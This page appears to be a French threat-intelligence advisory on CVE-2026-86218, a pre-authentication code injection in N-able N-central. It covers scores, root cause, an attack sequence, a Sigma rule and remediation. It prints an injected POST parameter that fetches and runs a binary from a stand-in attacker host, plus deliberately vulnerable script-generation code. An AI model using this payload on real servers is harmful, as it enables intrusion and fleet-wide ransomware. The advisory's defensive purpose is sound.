Aller au contenu

CVE-2026-86218 : exécution de code à distance pré-authentification par injection de code statique dans n-able n-central

HERMES

SCORE DE MENACE HERMES & RISQUE D'APPROVISIONNEMENT RMM

Cible : Serveur de gestion centralisée N-able N-central & parc d'agents clients
Confiance : 99%
98 / 100
EXTRÊME

Mesure la pertinence opérationnelle réelle, la militarisation de l'exploit et la posture de menace active.

Décomposition des dimensions
Exploitabilité 20 / 20
Activité de menace 20 / 20
Militarisation 20 / 20
Exposition 19 / 20
Prévalence 18 / 20
Impact 20 / 20
Maturité de l'exploit 20 / 20
Potentiel d'attaque en chaîne 20 / 20
⚖️ Divergence & Justification opérationnelle

Tant le standard CVSS v3.1 (10.0) que le score Hermes (98) traduisent une criticité absolue. La divergence opérationnelle repose sur le multiplicateur catastrophique de la chaîne logistique : N-able N-central est une plateforme de télégestion (RMM) déployée par les fournisseurs de services gérés (MSP) pour administrer des dizaines de milliers de postes et serveurs d'entreprise. Un attaquant non authentifié prenant le contrôle du serveur central hérite immédiatement du pouvoir d'exécution sur l'intégralité des agents déployés sous l'identité NT AUTHORITY\SYSTEM, permettant le chiffrement simultané de parcs entiers en quelques minutes sans franchir les pare-feux des clients.

HASS

SÉVÉRITÉ AGENTIQUE HASS & ORCHESTRATION DU PARC

Cible : Démons de maintenance automatique, stratégies d'automatisation & moteurs de télédistribution
Confiance : 93%
85 / 100
CRITIQUE

Mesure le risque systémique spécifique découlant de l'autonomie, de l'autorité des outils et de l'exécution en cascade.

Décomposition des dimensions
Autonomie décisionnelle 18 / 20
Accès aux outils & APIs 19 / 20
Privilege 15 / 15
Persistence 14 / 15
External Impact 15 / 15
Propagation 15 / 15
⚖️ Divergence & Justification opérationnelle

N-central opère en gestionnaire de flotte hautement autonome doté de prérogatives d'exécution de scripts PowerShell, d'installateurs logiciels et de déploiement de correctifs. L'exploitation de cette faille pré-authentification permet de détourner le mécanisme légitime d'automatisation pour diffuser des charges hostiles, contournant totalement les défenses EDR locales.

🕸️ Graphe de connaissances connecté & Provenance

CVE-2026-86218: Pre-Authentication Remote Code Execution via Static Code Injection in N-able N-centralVULNÉRABILITÉ

Nœuds connectés : 1
Relations sortantes actives
→ affectsCOMPOSANTN-able N-central RMM
98% VERY_HIGH

Software platform affected by security vulnerabilities and agentic attack patterns.

🔍 Pourquoi cette relation ? (Preuves & Provenance)

“Confirmed security vulnerability in N-able N-central RMM documented in Hermes dossier.”

Preuves vérifiées associées :

1. Contexte technique & matrice des logiciels affectés

Section intitulée « 1. Contexte technique & matrice des logiciels affectés »

N-central constitue le centre de commandement névralgique des opérations d’infogérance, échangeant des données de télémétrie et des ordres d’exécution via des canaux chiffrés (ports TCP 443 / 5280) avec des agents installés sur les postes de travail et contrôleurs de domaine.

ParamètreSpécification techniquePortée opérationnelle
Identifiant CVECVE-2026-86218Avis officiel N-able / Référence catalogue CISA KEV
Classe de vulnérabilitéInjection de code statique (CWE-96)Données non assainies injectées dans des scripts exécutables
Composant affectéPortail de gestion web N-central & API de traitementRoutines d’ingestion des requêtes HTTP pré-authentification
Mécanisme déclencheurRequête HTTP POST forgée vers un point de terminaison publicInjection de commandes shell dans des gabarits backend
Authentification requiseAucune (PR:N)Attaque directe initiée depuis l’Internet public
Interaction utilisateurAucune (UI:N)Exécution immédiate côté serveur dès réception de la requête
Privilèges obtenusSYSTEM / root + Prise de contrôle de la flotteLa compromission s’étend du serveur central à tous les agents
Statut CISA KEVRépertoriée (Ajoutée le 8 septembre 2026)Exploitation avérée dans des attaques de rançongiciels
Versions affectéesToutes versions antérieures au build 2026.3.1.14Déploiements sur site (on-premises) de serveurs N-central
Version corrigée2026.3.1.14 (N-central 2026.3 Hotfix 4)Neutralisation des paramètres et suppression des écritures dynamiques

2. Anatomie de la vulnérabilité & analyse de cause racine

Section intitulée « 2. Anatomie de la vulnérabilité & analyse de cause racine »

L’architecture applicative de N-central combine des services backend Java, PHP et Python orchestrés derrière un proxy inverse Apache HTTP ou Nginx. Plusieurs points de terminaison hérités traitent des requêtes de configuration préalable, de personnalisation d’interface ou de diagnostic réseau avant toute ouverture de session utilisateur.

Dans les versions précédant le build 2026.3.1.14, un gestionnaire HTTP acceptait des valeurs de configuration transmises par l’utilisateur (telles que des URL de rappel télémétrique ou des chaînes de localisation) et les concaténait directement dans des fichiers de scripts exécutables créés sur le disque :

// Représentation conceptuelle de la génération non sécurisée de scripts dans N-central
public void handleUnauthenticatedConfigRequest(HttpServletRequest request, HttpServletResponse response) {
String callbackParam = request.getParameter("telemetry_handler");
// VULNÉRABLE : concaténation directe dans un gabarit de script exécutable
String scriptTemplate = "#!/bin/bash\n" +
"# N-central Generated Callback Handler\n" +
"CALLBACK_TARGET=\"" + callbackParam + "\"\n" +
"python3 -c \"import requests; requests.get('$CALLBACK_TARGET')\"\n";
// Écriture dans le répertoire de scripts exécutables
File outputFile = new File("/opt/n-central/webapps/dynamic_handlers/callback.sh");
FileUtils.writeStringToFile(outputFile, scriptTemplate, "UTF-8");
outputFile.setExecutable(true);
}

L’absence de filtrage des guillemets (") et des opérateurs de commande shell (;, |, `) permet à un attaquant d’échapper à la chaîne assignée et d’injecter des commandes shell arbitraires :

POST /admin/config_handler.do HTTP/1.1
Host: rmm.infogerance-msp.com
Content-Type: application/x-www-form-urlencoded
telemetry_handler="; curl -s https://c2.evil-nexus.com/agent.bin -o /tmp/k && chmod +x /tmp/k && /tmp/k; echo "

Dès l’écriture du gabarit ou lors de son invocation planifiée par le système, la charge injectée s’exécute avec les privilèges du processus web (root sous Linux, SYSTEM sous Windows).

L’effet démultiplicateur sur la chaîne logistique

Section intitulée « L’effet démultiplicateur sur la chaîne logistique »

Contrairement aux applications web isolées, la prise de contrôle d’un serveur RMM arme directement l’attaquant contre l’ensemble du parc géré :

  1. L’attaquant accède à la base relationnelle PostgreSQL interne de N-central, siphonnant les clés de chiffrement des agents et les mots de passe de maintenance stockés.
  2. L’attaquant crée une tâche planifiée globale ciblant tous les périphériques gérés.
  3. Le serveur central distribue l’ordre d’exécution vers l’ensemble des agents clients (ncentralagent.exe).
  4. L’agent client exécute la charge utile localement avec le compte NT AUTHORITY\SYSTEM, contournant les barrières de filtrage périphérique et les antivirus locaux qui accordent une confiance aveugle au binaire RMM signé.

3. Vecteurs d’attaque & cinématique d’exécution

Section intitulée « 3. Vecteurs d’attaque & cinématique d’exécution »

Le diagramme séquentiel détaille le déroulement complet de l’attaque, depuis l’injection HTTP initiale jusqu’à la compromission des réseaux d’entreprises clientes.

sequenceDiagram
autonumber
actor Attaquant as Cyberattaquant (Externe)
participant NCentral as Serveur N-central (Port 443)
participant WebApp as Gestionnaire web vulnérable
participant DB as Base interne PostgreSQL
participant Agent1 as Contrôleur de domaine (Client A)
participant Agent2 as Serveur d'entreprise (Client B)
participant C2 as Infrastructure hostile
Attaquant->>NCentral: Requête POST /config_handler.do piégée
NCentral->>WebApp: Routage de la requête (Sans authentification)
WebApp->>WebApp: Écriture des commandes injectées dans le script statique
WebApp->>NCentral: Exécution de la charge shell sous privilèges root/SYSTEM
Note over NCentral: Prise de contrôle administrative totale du serveur RMM
Attaquant->>DB: Extraction des clés cryptographiques des agents clients
Attaquant->>NCentral: Déploiement d'une tâche d'automatisation malveillante
NCentral->>Agent1: Télédistribution de la tâche via le tunnel chiffré (Port 443)
NCentral->>Agent2: Télédistribution de la tâche via le tunnel chiffré (Port 443)
Note over Agent1,Agent2: Exécution de la charge avec privilèges NT AUTHORITY\SYSTEM
Agent1->>C2: Exfiltration de la base Active Directory NTDS.dit
Agent2-->>Agent2: Chiffrement des volumes de données et suppression des Shadow Copies

L’investigation sur une infrastructure N-central implique la corrélation des journaux web, la traçabilité des processus et l’analyse de l’historique des tâches de télédistribution des agents.

title: Création anormale de processus depuis le serveur web N-central
id: 5b6c7d8e-9f0a-4b1c-2d3e-ncentral-rce-fr
status: experimental
description: Détecte l'apparition d'interpréteurs de commandes ou d'outils de téléchargement réseau issus des processus web de N-able N-central, signalant l'exploitation de la CVE-2026-86218.
references:
- https://me.n-able.com/s/security-advisory/aArVy0000002Ld3KAE/cve202686218-preauthentication-remote-code-execution
author: Hermes Codex Cyber Intelligence
date: 2026-09-15
tags:
- attack.initial_access
- attack.t1190
- attack.execution
- attack.t1059.004
logsource:
category: process_creation
product: linux
detection:
selection_parent:
ParentImage|contains:
- '/n-central/'
- '/apache2/'
- '/nginx/'
- '/tomcat'
selection_child:
Image|endswith:
- '/bin/sh'
- '/bin/bash'
- '/usr/bin/curl'
- '/usr/bin/wget'
- '/usr/bin/python3'
- '/usr/bin/nc'
condition: selection_parent and selection_child
falsepositives:
- Scripts officiels exécutés lors des opérations d'assistance technique N-able.
level: critical

  1. Application immédiate de la mise à niveau logicielle : Tous les clients exploitant des serveurs N-central sur site doivent migrer immédiatement vers N-central 2026.3 Hotfix 4 (build 2026.3.1.14) ou ultérieure. Les environnements hébergés en mode SaaS (NCOD) ont été mis à jour par l’éditeur.

  2. Isolement réseau de la console d’administration (mesure d’urgence) : Si le déploiement du correctif ne peut être réalisé dans l’heure, restreindre immédiatement l’accès aux ports web 443/80 :

    • Bloquer l’accès public et restreindre l’administration aux seules adresses IP de confiance ou via un VPN d’exploitation.
    • Séparer le port d’écoute d’enregistrement des agents du portail web d’administration technique.
  3. Audit approfondi des tâches et scripts déployés sur le parc : Inspecter l’historique complet des automatisations exécutées au cours des 14 derniers jours. Vérifier l’intégrité des scripts PowerShell et des règles de déploiement logiciel.

  4. Rotation d’urgence de l’ensemble des identifiants et secrets : Procéder au renouvellement :

    • Des mots de passe de la base de données PostgreSQL de N-central.
    • Des comptes d’administration des techniciens MSP et des clés d’intégration API.
    • Des identifiants de comptes Administrateur du domaine stockés dans les gestionnaires de mots de passe intégrés à N-central.